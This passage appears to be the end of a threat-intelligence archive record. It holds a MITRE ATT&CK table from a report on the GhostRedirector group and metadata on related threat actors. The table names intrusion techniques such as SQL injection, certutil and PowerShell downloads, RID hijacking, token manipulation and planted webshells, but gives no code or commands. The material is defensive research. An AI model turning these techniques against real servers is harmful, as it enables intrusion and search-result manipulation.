ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1588.002 Obtain Capabilities: Tool\r\nGhostRedirector uses .NET Reactor to\r\nobfuscate its tools, and used EfsPotato and\r\nBadPotato to develop custom privilege\r\nescalation tools.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nGhostRedirector develops its own\r\nmalware\r\nT1608.006\r\nStage Capabilities: SEO\r\nPoisoning\r\nGhostRedirector uses SEO poisoning to\r\nmanipulate search results and drive traffic\r\nto a third-party website.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nGhostRedirector uses malicious domains\r\nfor hosting payloads and for its C\u0026C\r\nservers.\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nGhostRedirector leverages Cloudflare on\r\nits infrastructure.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 18 of 20\n\nTactic ID Name Description\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nGhostRedirector has staged Rungan and\r\nGamshen on attacker-controlled servers.\r\nT1608.002\r\nStage Capabilities: Upload\r\nTool\r\nGhostRedirector has staged various\r\nmalicious and legitimate tools on attacker-controlled servers.\r\nT1588.003\r\nObtain Capabilities: Code\r\nSigning Certificates\r\nGhostRedirector obtained a certificate for\r\nsigning its tools, like those for privilege\r\nescalation.\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nGhostRedirector exploits an unknown\r\nSQL injection vulnerability on the victim’s\r\nserver.\r\nExecution\r\nT1106 Native API\r\nGhostRedirector may use APIs such as\r\nHttpInitialize and HttpAddUrl for\r\nregistering a URL.\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nGhostRedirector uses PowerShell\r\ninterpreter to download malware.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nGhostRedirector can execute cmd.exe\r\ncommands to download malware.\r\nT1559\r\nInter-Process\r\nCommunication\r\nComdai can create a pipe to communicate\r\nand receive information from another\r\nprocess.\r\nPersistence T1546 Event Triggered Execution\r\nGamshen is loaded by the IIS Worker\r\nProcess (w3wp.exe) when the IIS server\r\nreceives an inbound HTTP request.\r\nPrivilege\r\nEscalation\r\nT1134 Access Token Manipulation\r\nGhostRedirector can manipulate tokens to\r\nperform a local privilege escalation.\r\nT1112 Modify Registry\r\nGhostRedirector can modify a Windows\r\nregistry key to perform RID hijacking.\r\nDefense\r\nEvasion T1027\r\nObfuscated Files or\r\nInformation\r\nGhostRedirector obfuscates its local\r\nprivilege escalation tools using .NET\r\nReactor.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 19 of 20\n\nTactic ID Name Description\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nGhostRedirector embedded webshells into\r\nits payloads like Zunput to be dropped on\r\ncompromised server.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nGhostRedirector uses AES in CBC mode\r\nto decrypt strings in the backdoor Rungan.\r\nDiscovery T1083 File and Directory Discovery\r\nGhostRedirector can use Zunput to list\r\ndirectory content on a victim’s server.\r\nCommand and\r\nControl\r\nT1105 Ingress Tool Transfer\r\nGhostRedirector can abuse the tool\r\ncertutil.exe to download malware.\r\nT1219 Remote Access Software\r\nGhostRedirector may use the GoToHTTP\r\ntool for connecting remotely to victims.\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nGhostRedirector relies on HTTP to\r\ncommunicate with the backdoor Rungan.\r\nT1008 Fallback Channels\r\nGhostRedirector can deploy the tool\r\nGoToHTTP or create malicious users on\r\nthe compromised server to maintain\r\naccess.\r\nImpact T1565 Data Manipulation\r\nGhostRedirector can modify the response\r\nof a compromised server intended for the\r\nGoogle crawler, in attempts to influence\r\nsearch results order.\r\nSource: https://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/"
	],
	"report_names": [
		"ghostredirector-poisons-windows-servers-backdoors-side-potatoes"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0e62ad61-c51d-460e-a587-b11d17bb2fb3",
			"created_at": "2024-10-04T02:00:04.754794Z",
			"updated_at": "2026-04-10T02:00:03.712878Z",
			"deleted_at": null,
			"main_name": "DragonRank",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonRank",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9a008ebb-676f-4c3b-9e25-e19305d1b5d7",
			"created_at": "2026-01-23T02:00:03.286173Z",
			"updated_at": "2026-04-10T02:00:03.928041Z",
			"deleted_at": null,
			"main_name": "GhostRedirector",
			"aliases": [],
			"source_name": "MISPGALAXY:GhostRedirector",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434250,
	"ts_updated_at": 1775826741,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.pdf",
		"text": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.txt",
		"img": "https://archive.orkl.eu/6890f97b76084593958ddc4b04bd15e6091e864e.jpg"
	}
}